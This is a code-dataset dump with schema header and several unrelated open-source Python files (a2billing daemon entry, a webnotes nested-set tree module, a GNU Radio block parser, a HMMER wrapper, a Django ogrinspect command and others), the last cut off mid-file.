repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
cemrecan/a2billing-spyne | a2billing_spyne/main.py | 2 | 2538 | # encoding: utf8
#
# This file is part of the a2billing-spyne project.
# Copyright (c), Arskom Ltd. (arskom.com.tr),
# Cemrecan Ünal <[email protected]>.
# Burak Arslan <[email protected]>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the Arskom Ltd. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
from contextlib import closing
import logging
logger = logging.getLogger(__name__)
def bootstrap(config):
from neurons import TableModel
import a2billing_spyne.model
db = config.get_main_store()
with closing(db.Session()) as session:
TableModel.Attributes.sqla_metadata.create_all(checkfirst=True)
session.commit()
def init(config):
from a2billing_spyne.application import start_a2bs
logger.debug("This is init.")
return [
('a2bs', start_a2bs),
]
def main():
import sys
from neurons.daemon import ServiceDaemon
from neurons.daemon.main import main as neurons_main
return neurons_main('a2billing-spyne',
sys.argv, init, bootstrap, cls=ServiceDaemon)
| bsd-3-clause | 5,981,095,394,154,214,000 | 36.308824 | 80 | 0.734332 | false |
saurabh6790/omnitech-lib | webnotes/utils/nestedset.py | 10 | 7568 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Tree (Hierarchical) Nested Set Model (nsm)
#
# To use the nested set model,
# use the following pattern
# 1. name your parent field as "parent_item_group" if not have a property nsm_parent_field as your field name in the document class
# 2. have a field called "old_parent" in your fields list - this identifies whether the parent has been changed
# 3. call update_nsm(doc_obj) in the on_upate method
# ------------------------------------------
from __future__ import unicode_literals
import webnotes
from webnotes import msgprint, _
# called in the on_update method
def update_nsm(doc_obj):
# get fields, data from the DocType
pf, opf = 'parent_node', 'old_parent'
if str(doc_obj.__class__)=='webnotes.model.doc.Document':
# passed as a Document object
d = doc_obj
else:
# passed as a DocType object
d = doc_obj.doc
if hasattr(doc_obj,'nsm_parent_field'):
pf = doc_obj.nsm_parent_field
if hasattr(doc_obj,'nsm_oldparent_field'):
opf = doc_obj.nsm_oldparent_field
p, op = d.fields.get(pf, ''), d.fields.get(opf, '')
# has parent changed (?) or parent is None (root)
if not d.lft and not d.rgt:
update_add_node(d, p or '', pf)
elif op != p:
update_move_node(d, pf)
# set old parent
d.fields[opf] = p
webnotes.conn.set_value(d.doctype, d.name, opf, p or '')
# reload
d._loadfromdb()
def update_add_node(doc, parent, parent_field):
"""
insert a new node
"""
from webnotes.utils import now
n = now()
doctype = doc.doctype
name = doc.name
# get the last sibling of the parent
if parent:
left, right = webnotes.conn.sql("select lft, rgt from `tab%s` where name=%s" \
% (doctype, "%s"), parent)[0]
validate_loop(doc.doctype, doc.name, left, right)
else: # root
right = webnotes.conn.sql("select ifnull(max(rgt),0)+1 from `tab%s` where ifnull(`%s`,'') =''" % (doctype, parent_field))[0][0]
right = right or 1
# update all on the right
webnotes.conn.sql("update `tab%s` set rgt = rgt+2, modified='%s' where rgt >= %s" %(doctype,n,right))
webnotes.conn.sql("update `tab%s` set lft = lft+2, modified='%s' where lft >= %s" %(doctype,n,right))
# update index of new node
if webnotes.conn.sql("select * from `tab%s` where lft=%s or rgt=%s"% (doctype, right, right+1)):
webnotes.msgprint("Nested set error. Please send mail to support")
raise Exception
webnotes.conn.sql("update `tab%s` set lft=%s, rgt=%s, modified='%s' where name='%s'" % (doctype,right,right+1,n,name))
return right
def update_move_node(doc, parent_field):
parent = doc.fields.get(parent_field)
if parent:
new_parent = webnotes.conn.sql("""select lft, rgt from `tab%s`
where name = %s""" % (doc.doctype, '%s'), parent, as_dict=1)[0]
validate_loop(doc.doctype, doc.name, new_parent.lft, new_parent.rgt)
# move to dark side
webnotes.conn.sql("""update `tab%s` set lft = -lft, rgt = -rgt
where lft >= %s and rgt <= %s"""% (doc.doctype, '%s', '%s'), (doc.lft, doc.rgt))
# shift left
diff = doc.rgt - doc.lft + 1
webnotes.conn.sql("""update `tab%s` set lft = lft -%s, rgt = rgt - %s
where lft > %s"""% (doc.doctype, '%s', '%s', '%s'), (diff, diff, doc.rgt))
# shift left rgts of ancestors whose only rgts must shift
webnotes.conn.sql("""update `tab%s` set rgt = rgt - %s
where lft < %s and rgt > %s"""% (doc.doctype, '%s', '%s', '%s'),
(diff, doc.lft, doc.rgt))
if parent:
new_parent = webnotes.conn.sql("""select lft, rgt from `tab%s`
where name = %s""" % (doc.doctype, '%s'), parent, as_dict=1)[0]
# set parent lft, rgt
webnotes.conn.sql("""update `tab%s` set rgt = rgt + %s
where name = %s"""% (doc.doctype, '%s', '%s'), (diff, parent))
# shift right at new parent
webnotes.conn.sql("""update `tab%s` set lft = lft + %s, rgt = rgt + %s
where lft > %s""" % (doc.doctype, '%s', '%s', '%s'),
(diff, diff, new_parent.rgt))
# shift right rgts of ancestors whose only rgts must shift
webnotes.conn.sql("""update `tab%s` set rgt = rgt + %s
where lft < %s and rgt > %s""" % (doc.doctype, '%s', '%s', '%s'),
(diff, new_parent.lft, new_parent.rgt))
new_diff = new_parent.rgt - doc.lft
else:
# new root
max_rgt = webnotes.conn.sql("""select max(rgt) from `tab%s`""" % doc.doctype)[0][0]
new_diff = max_rgt + 1 - doc.lft
# bring back from dark side
webnotes.conn.sql("""update `tab%s` set lft = -lft + %s, rgt = -rgt + %s
where lft < 0"""% (doc.doctype, '%s', '%s'), (new_diff, new_diff))
def rebuild_tree(doctype, parent_field):
"""
call rebuild_node for all root nodes
"""
# get all roots
webnotes.conn.auto_commit_on_many_writes = 1
right = 1
result = webnotes.conn.sql("SELECT name FROM `tab%s` WHERE `%s`='' or `%s` IS NULL ORDER BY name ASC" % (doctype, parent_field, parent_field))
for r in result:
right = rebuild_node(doctype, r[0], right, parent_field)
webnotes.conn.auto_commit_on_many_writes = 0
def rebuild_node(doctype, parent, left, parent_field):
"""
reset lft, rgt and recursive call for all children
"""
from webnotes.utils import now
n = now()
# the right value of this node is the left value + 1
right = left+1
# get all children of this node
result = webnotes.conn.sql("SELECT name FROM `tab%s` WHERE `%s`='%s'" % (doctype, parent_field, parent))
for r in result:
right = rebuild_node(doctype, r[0], right, parent_field)
# we've got the left value, and now that we've processed
# the children of this node we also know the right value
webnotes.conn.sql("UPDATE `tab%s` SET lft=%s, rgt=%s, modified='%s' WHERE name='%s'" % (doctype,left,right,n,parent))
#return the right value of this node + 1
return right+1
def validate_loop(doctype, name, lft, rgt):
"""check if item not an ancestor (loop)"""
if name in webnotes.conn.sql_list("""select name from `tab%s` where lft <= %s and rgt >= %s""" % (doctype,
"%s", "%s"), (lft, rgt)):
webnotes.throw("""Item cannot be added to its own descendents.""")
class DocTypeNestedSet(object):
def on_update(self):
update_nsm(self)
self.validate_ledger()
def on_trash(self):
parent = self.doc.fields[self.nsm_parent_field]
if not parent:
msgprint(_("Root ") + self.doc.doctype + _(" cannot be deleted."), raise_exception=1)
self.doc.fields[self.nsm_parent_field] = ""
update_nsm(self)
def before_rename(self, olddn, newdn, merge=False, group_fname="is_group"):
if merge:
is_group = webnotes.conn.get_value(self.doc.doctype, newdn, group_fname)
if self.doc.fields[group_fname] != is_group:
webnotes.throw(_("""Merging is only possible between Group-to-Group or
Ledger-to-Ledger"""))
def after_rename(self, olddn, newdn, merge=False):
if merge:
parent_field = "parent_" + self.doc.doctype.replace(" ", "_").lower()
rebuild_tree(self.doc.doctype, parent_field)
def validate_one_root(self):
if not self.doc.fields[self.nsm_parent_field]:
if webnotes.conn.sql("""select count(*) from `tab%s` where
ifnull(%s, '')=''""" % (self.doc.doctype, self.nsm_parent_field))[0][0] > 1:
webnotes.throw(_("""Multiple root nodes not allowed."""))
def validate_ledger(self, group_identifier="is_group"):
if self.doc.fields.get(group_identifier) == "No":
if webnotes.conn.sql("""select name from `tab%s` where %s=%s and docstatus!=2""" %
(self.doc.doctype, self.nsm_parent_field, '%s'), (self.doc.name)):
webnotes.throw(self.doc.doctype + ": " + self.doc.name +
_(" can not be marked as a ledger as it has existing child"))
| mit | 4,414,446,700,787,263,500 | 34.2 | 143 | 0.643103 | false |
alfayez/gnuradio | gr-utils/src/python/modtool/parser_cc_block.py | 9 | 10113 | #
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
''' A parser for blocks written in C++ '''
import re
import sys
def dummy_translator(the_type, default_v=None):
""" Doesn't really translate. """
return the_type
class ParserCCBlock(object):
""" Class to read blocks written in C++ """
def __init__(self, filename_cc, filename_h, blockname, version, type_trans=dummy_translator):
self.code_cc = open(filename_cc).read()
self.code_h = open(filename_h).read()
self.blockname = blockname
self.type_trans = type_trans
self.version = version
def read_io_signature(self):
""" Scans a .cc file for an IO signature. """
def _figure_out_iotype_and_vlen(iosigcall, typestr):
""" From a type identifier, returns the data type.
E.g., for sizeof(int), it will return 'int'.
Returns a list! """
if 'gr_make_iosignaturev' in iosigcall:
print 'tbi'
raise ValueError
return {'type': [_typestr_to_iotype(x) for x in typestr.split(',')],
'vlen': [_typestr_to_vlen(x) for x in typestr.split(',')]
}
def _typestr_to_iotype(typestr):
""" Convert a type string (e.g. sizeof(int) * vlen) to the type (e.g. 'int'). """
type_match = re.search('sizeof\s*\(([^)]*)\)', typestr)
if type_match is None:
return self.type_trans('char')
return self.type_trans(type_match.group(1))
def _typestr_to_vlen(typestr):
""" From a type identifier, returns the vector length of the block's
input/out. E.g., for 'sizeof(int) * 10', it returns 10. For
'sizeof(int)', it returns '1'. For 'sizeof(int) * vlen', it returns
the string vlen. """
# Catch fringe case where no sizeof() is given
if typestr.find('sizeof') == -1:
return typestr
if typestr.find('*') == -1:
return '1'
vlen_parts = typestr.split('*')
for fac in vlen_parts:
if fac.find('sizeof') != -1:
vlen_parts.remove(fac)
if len(vlen_parts) == 1:
return vlen_parts[0].strip()
elif len(vlen_parts) > 1:
return '*'.join(vlen_parts).strip()
iosig = {}
iosig_regex = '(?P<incall>gr_make_io_signature[23v]?)\s*\(\s*(?P<inmin>[^,]+),\s*(?P<inmax>[^,]+),' + \
'\s*(?P<intype>(\([^\)]*\)|[^)])+)\),\s*' + \
'(?P<outcall>gr_make_io_signature[23v]?)\s*\(\s*(?P<outmin>[^,]+),\s*(?P<outmax>[^,]+),' + \
'\s*(?P<outtype>(\([^\)]*\)|[^)])+)\)'
iosig_match = re.compile(iosig_regex, re.MULTILINE).search(self.code_cc)
try:
iosig['in'] = _figure_out_iotype_and_vlen(iosig_match.group('incall'),
iosig_match.group('intype'))
iosig['in']['min_ports'] = iosig_match.group('inmin')
iosig['in']['max_ports'] = iosig_match.group('inmax')
except ValueError, Exception:
print "Error: Can't parse input signature."
try:
iosig['out'] = _figure_out_iotype_and_vlen(iosig_match.group('outcall'),
iosig_match.group('outtype'))
iosig['out']['min_ports'] = iosig_match.group('outmin')
iosig['out']['max_ports'] = iosig_match.group('outmax')
except ValueError, Exception:
print "Error: Can't parse output signature."
return iosig
def read_params(self):
""" Read the parameters required to initialize the block """
def _scan_param_list(start_idx):
""" Go through a parameter list and return a tuple each:
(type, name, default_value). Python's re just doesn't cut
it for C++ code :( """
i = start_idx
c = self.code_h
if c[i] != '(':
raise ValueError
i += 1
param_list = []
read_state = 'type'
in_string = False
parens_count = 0 # Counts ()
brackets_count = 0 # Counts <>
end_of_list = False
this_type = ''
this_name = ''
this_defv = ''
WHITESPACE = ' \t\n\r\f\v'
while not end_of_list:
# Keep track of (), stop when reaching final closing parens
if not in_string:
if c[i] == ')':
if parens_count == 0:
if read_state == 'type' and len(this_type):
raise ValueError(
'Found closing parentheses before finishing last argument (this is how far I got: %s)'
% str(param_list)
)
if len(this_type):
param_list.append((this_type, this_name, this_defv))
end_of_list = True
break
else:
parens_count -= 1
elif c[i] == '(':
parens_count += 1
# Parameter type (int, const std::string, std::vector<gr_complex>, unsigned long ...)
if read_state == 'type':
if c[i] == '<':
brackets_count += 1
if c[i] == '>':
brackets_count -= 1
if c[i] == '&':
i += 1
continue
if c[i] in WHITESPACE and brackets_count == 0:
while c[i] in WHITESPACE:
i += 1
continue
if this_type == 'const' or this_type == '': # Ignore this
this_type = ''
elif this_type == 'unsigned': # Continue
this_type += ' '
continue
else:
read_state = 'name'
continue
this_type += c[i]
i += 1
continue
# Parameter name
if read_state == 'name':
if c[i] == '&' or c[i] in WHITESPACE:
i += 1
elif c[i] == '=':
if parens_count != 0:
raise ValueError(
'While parsing argument %d (%s): name finished but no closing parentheses.'
% (len(param_list)+1, this_type + ' ' + this_name)
)
read_state = 'defv'
i += 1
elif c[i] == ',':
if parens_count:
raise ValueError(
'While parsing argument %d (%s): name finished but no closing parentheses.'
% (len(param_list)+1, this_type + ' ' + this_name)
)
read_state = 'defv'
else:
this_name += c[i]
i += 1
continue
# Default value
if read_state == 'defv':
if in_string:
if c[i] == '"' and c[i-1] != '\\':
in_string = False
else:
this_defv += c[i]
elif c[i] == ',':
if parens_count:
raise ValueError(
'While parsing argument %d (%s): default value finished but no closing parentheses.'
% (len(param_list)+1, this_type + ' ' + this_name)
)
read_state = 'type'
param_list.append((this_type, this_name, this_defv))
this_type = ''
this_name = ''
this_defv = ''
else:
this_defv += c[i]
i += 1
continue
return param_list
# Go, go, go!
if self.version == '37':
make_regex = 'static\s+sptr\s+make\s*'
else:
make_regex = '(?<=_API)\s+\w+_sptr\s+\w+_make_\w+\s*'
make_match = re.compile(make_regex, re.MULTILINE).search(self.code_h)
try:
params_list = _scan_param_list(make_match.end(0))
except ValueError as ve:
print "Can't parse the argument list: ", ve.args[0]
sys.exit(0)
params = []
for plist in params_list:
params.append({'type': self.type_trans(plist[0], plist[2]),
'key': plist[1],
'default': plist[2],
'in_constructor': True})
return params
| gpl-3.0 | 7,838,489,100,535,980,000 | 43.946667 | 126 | 0.437556 | false |
xapple/seqsearch | seqsearch/search/hmmer.py | 1 | 4177 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Written by Lucas Sinclair.
MIT Licensed.
Contact at www.sinclair.bio
"""
# Built-in modules #
import warnings, multiprocessing
# Internal modules #
from seqsearch.databases.pfam import pfam
from seqsearch.databases.tigrfam import tigrfam
# First party modules #
from fasta import FASTA
from autopaths.file_path import FilePath
# Third party modules #
import sh
# Warnings #
warnings.filterwarnings("ignore", "Bio.SearchIO")
warnings.filterwarnings("ignore", "BiopythonWarning")
from Bio import SearchIO
###############################################################################
class HmmQuery(object):
"""An `hmmsearch` job."""
short_name = 'hmmsearch'
long_name = 'HMMER 3.1b2 (February 2015)'
executable = 'hmmsearch'
url = 'http://hmmer.org/'
license = 'GPLv3'
dependencies = []
def __nonzero__(self): return bool(self.out_path)
def __repr__(self):
return '<%s object on %s>' % (self.__class__.__name__, self.query)
def __init__(self, query_path, # The input sequences
db_path = pfam.hmm_db, # The database to search
seq_type = 'prot' or 'nucl', # The seq type of the query_path file
e_value = 0.001, # The search threshold
params = None, # Add extra params for the command line
out_path = None, # Where the results will be dropped
executable = None, # If you want a specific binary give the path
cpus = None): # The number of threads to use
# Save attributes #
self.query = FASTA(query_path)
self.db = FilePath(db_path)
self.params = params if params else {}
self.e_value = e_value
self.seq_type = seq_type
self.executable = FilePath(executable)
# Cores to use #
if cpus is None: self.cpus = min(multiprocessing.cpu_count(), 32)
else: self.cpus = cpus
# Auto detect database short name #
if db_path == 'pfam': self.db = pfam.hmm_db
if db_path == 'tigrfam': self.db = tigrfam.hmm_db
# Output #
if out_path is None:
self.out_path = FilePath(self.query.prefix_path + '.hmmout')
elif out_path.endswith('/'):
self.out_path = FilePath(out_path + self.query.prefix + '.hmmout')
else:
self.out_path = FilePath(out_path)
@property
def command(self):
# Executable #
if self.executable: cmd = [self.executable.path]
else: cmd = ["hmmsearch"]
# Essentials #
cmd += ('-o', '/dev/null', # direct output to file <f>, not stdout
'--tblout', self.out_path, # parsable table of per-sequence hits
'--seed', 1, # set RNG seed to <n>
'--notextw', # unlimited ASCII text output line width
'--acc', # prefer accessions over names in output
self.db,
self.query)
# Options #
for k,v in self.params.items(): cmd += [k, v]
# Return #
return map(str, cmd)
def run(self, cpus=None):
"""Simply run the HMM search locally."""
# Number of threads #
if cpus is None: cpus = self.cpus
# Checks #
assert self.query.exists
assert self.db.exists
# Check if query is not empty #
if self.query.count_bytes == 0:
message = "Hmm search on a file with no sequences. File at '%s'"
warnings.warn(message % self.query, RuntimeWarning)
return False
# Do it #
sh.Command(self.command[0])(['--cpu', str(cpus)] + self.command[1:])
@property
def hits(self):
if not self.out_path:
raise Exception("You can't access results from HMMER before running the algorithm.")
return SearchIO.read(self.out_path, 'hmmer3-tab')
| mit | -4,540,044,765,341,390,000 | 36.630631 | 99 | 0.534115 | false |
c17r/TagTrain | scripts/utils.py | 2 | 1576 | import os
import re
import sys
from importlib import import_module
_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
_SRC = os.path.join(_ROOT, 'src')
def make_readme(name, repo):
readme = os.path.join(_ROOT, 'README.rst')
with open(readme, 'w') as f:
f.write('''.. start-badges
.. list-table::
:stub-columns: 1
* - tests
- |coveralls|
* - package
- |travis|
.. |travis| image:: https://travis-ci.org/{name}/{repo}.svg?branch=master
:alt: Travis-CI Build Status
:target: https://travis-ci.org/{name}/{repo}
.. |coveralls| image:: https://coveralls.io/repos/github/{name}/{repo}/badge.svg?branch=master
:alt: Coverage Status
:target: https://coveralls.io/github/{name}/{repo}
.. end-badges
'''.format(name=name, repo=repo))
for doc in _get_modules():
f.write(doc)
f.write('')
def make_long_description():
return '\n'.join((doc for doc in _get_modules()))
def _get_modules():
_, folders, _ = next(os.walk(_SRC))
for folder in folders:
if 'egg-info' in folder:
continue
rv = get_module_string(folder)
if rv:
yield rv
def get_module_string(name):
init = os.path.join(_SRC, name, '__init__.py')
try:
with open(init, mode='r', encoding='utf-8') as f:
data = f.read()
return re.search('\A"""(.*)"""', data, flags=re.S | re.M).group(1)
except:
return None
def _get_setup():
sys.path.insert(0, _ROOT)
mod = import_module('setup')
return mod
| mit | 5,689,573,281,355,903,000 | 22.522388 | 94 | 0.578046 | false |
163gal/Time-Line | libs/wx/tools/helpviewer.py | 5 | 2507 | #----------------------------------------------------------------------
# Name: wx.tools.helpviewer
# Purpose: HTML Help viewer
#
# Author: Robin Dunn
#
# Created: 11-Dec-2002
# RCS-ID: $Id: helpviewer.py 45966 2007-05-11 18:54:09Z RD $
# Copyright: (c) 2002 by Total Control Software
# Licence: wxWindows license
#----------------------------------------------------------------------
"""
helpviewer.py -- Displays HTML Help in a wxHtmlHelpController window.
Usage:
helpviewer [--cache=path] helpfile [helpfile(s)...]
Where helpfile is the path to either a .hhp file or a .zip file
which contians a .hhp file. The .hhp files are the same as those
used by Microsoft's HTML Help Workshop for creating CHM files.
"""
import sys, os
#---------------------------------------------------------------------------
def makeOtherFrame(helpctrl):
import wx
parent = helpctrl.GetFrame()
otherFrame = wx.Frame(parent)
def main(args=sys.argv):
if len(args) < 2:
print __doc__
return
args = args[1:]
cachedir = None
if args[0][:7] == '--cache':
cachedir = os.path.expanduser(args[0].split('=')[1])
args = args[1:]
if len(args) == 0:
print __doc__
return
import wx
import wx.html
app = wx.PySimpleApp()
#wx.Log.SetActiveTarget(wx.LogStderr())
wx.Log.SetLogLevel(wx.LOG_Error)
# Set up the default config so the htmlhelp frame can save its preferences
app.SetVendorName('wxWidgets')
app.SetAppName('helpviewer')
cfg = wx.ConfigBase.Get()
# Add the Zip filesystem
wx.FileSystem.AddHandler(wx.ZipFSHandler())
# Create the viewer
helpctrl = wx.html.HtmlHelpController()
if cachedir:
helpctrl.SetTempDir(cachedir)
# and add the books
for helpfile in args:
print "Adding %s..." % helpfile
helpctrl.AddBook(helpfile, 1)
# The frame used by the HtmlHelpController is set to not prevent
# app exit, so in the case of a standalone helpviewer like this
# when the about box or search box is closed the help frame will
# be the only one left and the app will close unexpectedly. To
# work around this we'll create another frame that is never shown,
# but which will be closed when the helpviewer frame is closed.
wx.CallAfter(makeOtherFrame, helpctrl)
# start it up!
helpctrl.DisplayContents()
app.MainLoop()
if __name__ == '__main__':
main()
| gpl-3.0 | 1,577,971,815,337,801,700 | 26.549451 | 78 | 0.588353 | false |
reinout/django | django/contrib/gis/management/commands/ogrinspect.py | 20 | 5848 | import argparse
from django.contrib.gis import gdal
from django.core.management.base import BaseCommand, CommandError
from django.utils.inspect import get_func_args
class LayerOptionAction(argparse.Action):
"""
Custom argparse action for the `ogrinspect` `layer_key` keyword option
which may be an integer or a string.
"""
def __call__(self, parser, namespace, value, option_string=None):
try:
setattr(namespace, self.dest, int(value))
except ValueError:
setattr(namespace, self.dest, value)
class ListOptionAction(argparse.Action):
"""
Custom argparse action for `ogrinspect` keywords that require
a string list. If the string is 'True'/'true' then the option
value will be a boolean instead.
"""
def __call__(self, parser, namespace, value, option_string=None):
if value.lower() == 'true':
setattr(namespace, self.dest, True)
else:
setattr(namespace, self.dest, value.split(','))
class Command(BaseCommand):
help = (
'Inspects the given OGR-compatible data source (e.g., a shapefile) and outputs\n'
'a GeoDjango model with the given model name. For example:\n'
' ./manage.py ogrinspect zipcode.shp Zipcode'
)
requires_system_checks = False
def add_arguments(self, parser):
parser.add_argument('data_source', help='Path to the data source.')
parser.add_argument('model_name', help='Name of the model to create.')
parser.add_argument(
'--blank', dest='blank',
action=ListOptionAction, default=False,
help='Use a comma separated list of OGR field names to add '
'the `blank=True` option to the field definition. Set to `true` '
'to apply to all applicable fields.',
)
parser.add_argument(
'--decimal', dest='decimal',
action=ListOptionAction, default=False,
help='Use a comma separated list of OGR float fields to '
'generate `DecimalField` instead of the default '
'`FloatField`. Set to `true` to apply to all OGR float fields.',
)
parser.add_argument(
'--geom-name', dest='geom_name', default='geom',
help='Specifies the model name for the Geometry Field (defaults to `geom`)'
)
parser.add_argument(
'--layer', dest='layer_key',
action=LayerOptionAction, default=0,
help='The key for specifying which layer in the OGR data '
'source to use. Defaults to 0 (the first layer). May be '
'an integer or a string identifier for the layer.',
)
parser.add_argument(
'--multi-geom', action='store_true', dest='multi_geom',
help='Treat the geometry in the data source as a geometry collection.',
)
parser.add_argument(
'--name-field', dest='name_field',
help='Specifies a field name to return for the __str__() method.',
)
parser.add_argument(
'--no-imports', action='store_false', dest='imports',
help='Do not include `from django.contrib.gis.db import models` statement.',
)
parser.add_argument(
'--null', dest='null', action=ListOptionAction, default=False,
help='Use a comma separated list of OGR field names to add '
'the `null=True` option to the field definition. Set to `true` '
'to apply to all applicable fields.',
)
parser.add_argument(
'--srid', dest='srid',
help='The SRID to use for the Geometry Field. If it can be '
'determined, the SRID of the data source is used.',
)
parser.add_argument(
'--mapping', action='store_true', dest='mapping',
help='Generate mapping dictionary for use with `LayerMapping`.',
)
def handle(self, *args, **options):
data_source, model_name = options.pop('data_source'), options.pop('model_name')
# Getting the OGR DataSource from the string parameter.
try:
ds = gdal.DataSource(data_source)
except gdal.GDALException as msg:
raise CommandError(msg)
# Returning the output of ogrinspect with the given arguments
# and options.
from django.contrib.gis.utils.ogrinspect import _ogrinspect, mapping
# Filter options to params accepted by `_ogrinspect`
ogr_options = {k: v for k, v in options.items()
if k in get_func_args(_ogrinspect) and v is not None}
output = [s for s in _ogrinspect(ds, model_name, **ogr_options)]
if options['mapping']:
# Constructing the keyword arguments for `mapping`, and
# calling it on the data source.
kwargs = {
'geom_name': options['geom_name'],
'layer_key': options['layer_key'],
'multi_geom': options['multi_geom'],
}
mapping_dict = mapping(ds, **kwargs)
# This extra legwork is so that the dictionary definition comes
# out in the same order as the fields in the model definition.
rev_mapping = {v: k for k, v in mapping_dict.items()}
output.extend(['', '', '# Auto-generated `LayerMapping` dictionary for %s model' % model_name,
'%s_mapping = {' % model_name.lower()])
output.extend(" '%s': '%s'," % (
rev_mapping[ogr_fld], ogr_fld) for ogr_fld in ds[options['layer_key']].fields
)
output.extend([" '%s': '%s'," % (options['geom_name'], mapping_dict[options['geom_name']]), '}'])
return '\n'.join(output) + '\n'
| bsd-3-clause | 9,150,530,282,185,798,000 | 42.969925 | 112 | 0.582763 | false |
amahabal/PySeqsee | farg/core/categorization/binding.py | 1 | 1186 | # Copyright (C) 2011, 2012 Abhijit Mahabal
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this
# program. If not, see <http://www.gnu.org/licenses/>
"""Specification of how an instance is a member of some category."""
class Binding:
"""Specification of how an instance is a member of some category."""
def __init__(self, **bindings):
self.bindings = dict(bindings)
def GetBindingsForAttribute(self, attribute_name):
"""Get the binding of a single attribute."""
return self.bindings[attribute_name]
def __str__(self):
serialided_dict = dict((k, str(v)) for k, v in self.bindings.items())
return 'Bindings: %s' % serialided_dict
| gpl-3.0 | 2,296,654,989,369,674,000 | 41.357143 | 85 | 0.730185 | false |
ralphwort/chef-repo | build/python-neutronclient/neutronclient/tests/unit/test_cli20_extensions.py | 2 | 1955 | # Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from neutronclient.neutron.v2_0.extension import ListExt
from neutronclient.neutron.v2_0.extension import ShowExt
from neutronclient.tests.unit.test_cli20 import CLITestV20Base
from neutronclient.tests.unit.test_cli20 import MyApp
class CLITestV20Extension(CLITestV20Base):
id_field = 'alias'
def test_list_extensions(self):
resources = 'extensions'
cmd = ListExt(MyApp(sys.stdout), None)
contents = [{'alias': 'ext1', 'name': 'name1', 'other': 'other1'},
{'alias': 'ext2', 'name': 'name2', 'other': 'other2'}]
ret = self._test_list_resources(resources, cmd,
response_contents=contents)
ret_words = set(ret.split())
# Check only the default columns are shown.
self.assertTrue('name' in ret_words)
self.assertTrue('alias' in ret_words)
self.assertFalse('other' in ret_words)
def test_show_extension(self):
# -F option does not work for ext-show at the moment, so -F option
# is not passed in the commandline args as other tests do.
resource = 'extension'
cmd = ShowExt(MyApp(sys.stdout), None)
args = [self.test_id]
ext_alias = self.test_id
self._test_show_resource(resource, cmd, ext_alias, args, fields=[])
| apache-2.0 | -5,203,050,540,671,098,000 | 40.595745 | 78 | 0.66445 | false |
xsteadfastx/pelican-plugins | liquid_tags/diag.py | 25 | 4100 | """
Blockdiag Tag
---------
This tag implements a liquid style tag for blockdiag [1]. You can use different
diagram types like blockdiag, seqdiag, packetdiag etc. [1]
[1] http://blockdiag.com/en/blockdiag/
Syntax
------
{% blockdiag {
<diagramm type> {
<CODE>
}
}
%}
Examples
--------
{% blockdiag {
blockdiag {
A -> B -> C;
B -> D;
}
}
%}
{% blockdiag {
actdiag {
A -> B -> C -> D -> E;
lane {
A; C; E;
}
lane {
B; D;
}
}
}
%}
{% blockdiag {
packetdiag {
0-7: Source Port
8-15: Destination Port
16-31: Sequence Number
32-47: Acknowledgment Number
}
}
%}
...
Output
------
<span class="blockdiag" style="align: center;"><img src="data:image/png;base64,_BASE64_IMAGE DATA_/></span>
"""
import io
import os
import sys
import base64
import re
from .mdx_liquid_tags import LiquidTags
SYNTAX = '{% blockdiag [diagram type] [code] %}'
